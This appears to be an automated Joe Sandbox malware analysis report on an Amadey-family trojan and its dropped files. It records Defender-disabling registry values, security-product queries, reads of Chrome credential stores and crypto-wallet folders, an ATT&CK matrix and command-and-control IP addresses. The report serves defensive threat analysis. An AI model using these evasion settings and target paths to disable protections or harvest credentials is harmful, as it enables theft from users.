                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: kLL28QE.exe, 00000006.00000002.409253005.0000000002F9C000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.414920676.00000000080FA000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.414920676.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    Source: Yara match; File source: dump.pcap, type: PCAP
                    Source: Yara match; File source: Process Memory Space: kLL28QE.exe PID: 2992, type: MEMORYSTR
                    Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe, type: DROPPED
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: ElectrumE#
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: JaxxE#
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: ExodusE#
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: EthereumE#
                    Source: kLL28QE.exe; String found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe; File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: Yara match; File source: Process Memory Space: kLL28QE.exe PID: 2992, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match; File source: dump.pcap, type: PCAP
                    Source: Yara match; File source: Process Memory Space: kLL28QE.exe PID: 2992, type: MEMORYSTR

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | 221 Windows Management Instrumentation | 1 Windows Service | 2 Bypass User Access Control | 21 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
                    Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 3 Data from Local System | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 1 Windows Service | 2 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | 1 Service Execution | Logon Script (Mac) | 1 Process Injection | 2 Software Packing | NTDS | 137 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 361 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Bypass User Access Control | Cached Domain Credentials | 231 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Masquerading | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 231 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                    Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Process Injection | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                    Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | 1 Rundll32 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

                    [Behavior graph: ID 815074, Sample: y0EWt2mE9h.exe, Startdate: 25/02/2023, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label | Link
                    y0EWt2mE9h.exe | 69% | ReversingLabs | Win32.Trojan.Amadey |
                    y0EWt2mE9h.exe | 52% | Virustotal | | Browse
                    y0EWt2mE9h.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe | 72% | ReversingLabs | Win32.Trojan.Amadey |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe | 70% | Virustotal | | Browse
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe | 56% | ReversingLabs | Win32.Trojan.Tedy |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe | 46% | Virustotal | | Browse
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe | 46% | ReversingLabs | Win32.Trojan.Seraph |
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe | 46% | Virustotal | | Browse
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe | 54% | ReversingLabs | Win32.Trojan.Tedy |
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe | 41% | Virustotal | | Browse
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exe | 46% | ReversingLabs | Win32.Packed.Generic |
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exe | 48% | Virustotal | | Browse
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe | 54% | ReversingLabs | Win32.Trojan.Tedy |
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe | 56% | ReversingLabs | Win32.Trojan.Casdet |
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe | 46% | ReversingLabs | Win32.Trojan.Seraph |
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    193.233.20.15/dF30Hn4m/index.php | 0% | URL Reputation | safe |
                    193.233.20.23:4124 | 4% | Virustotal | | Browse
                    193.233.20.23:4124 | 0% | Avira URL Cloud | safe |
                    No contacted domains info
                    Name | Malicious | Antivirus Detection | Reputation
                    193.233.20.23:4124 | true | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                    193.233.20.15/dF30Hn4m/index.php | true | URL Reputation: safe | low
                    Name | Source | Malicious | Antivirus Detection | Reputation
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/04/sckLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id9ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id20kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id21kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id22kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssuekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id1ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=kLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedkLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplaykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegokLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinarykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingkLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssuekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trustkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id10kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id11kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id12kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id16ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Entity/Id13kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id14kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id15kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id16kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/NoncekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://tempuri.org/Entity/Id17kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id18kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id5ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id19kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnskLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id10ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000005055000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm8DkLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id8ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2006/02/addressingidentitykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/soap/envelope/kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://search.yahoo.com?fr=crmas_sfpfkLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trustkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/06/addressingexkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoorkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/NoncekLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultkLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs
IP:193.233.20.23
Domain:unknown
Country:Russian Federation
ASN:8749
ASN Name:REDCOM-ASRedcomKhabarovskRussiaRU
Malicious:true

Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:815074
Start date and time:2023-02-25 09:07:26 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 12m 10s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:13
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Sample file name:y0EWt2mE9h.exe
                                                                                                                                                      Original Sample Name:0588e4e46299165692a58b2046b3ea12.exe
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@15/10@0/1
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 28.7% (good quality ratio 27.5%)
                                                                                                                                                      • Quality average: 84.7%
                                                                                                                                                      • Quality standard deviation: 23.7%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 96%
                                                                                                                                                      • Number of executed functions: 139
                                                                                                                                                      • Number of non-executed functions: 146
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                      • Override analysis time to 240s for rundll32
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:09:10 | API Interceptor | 11x Sleep call for process: kLL28QE.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
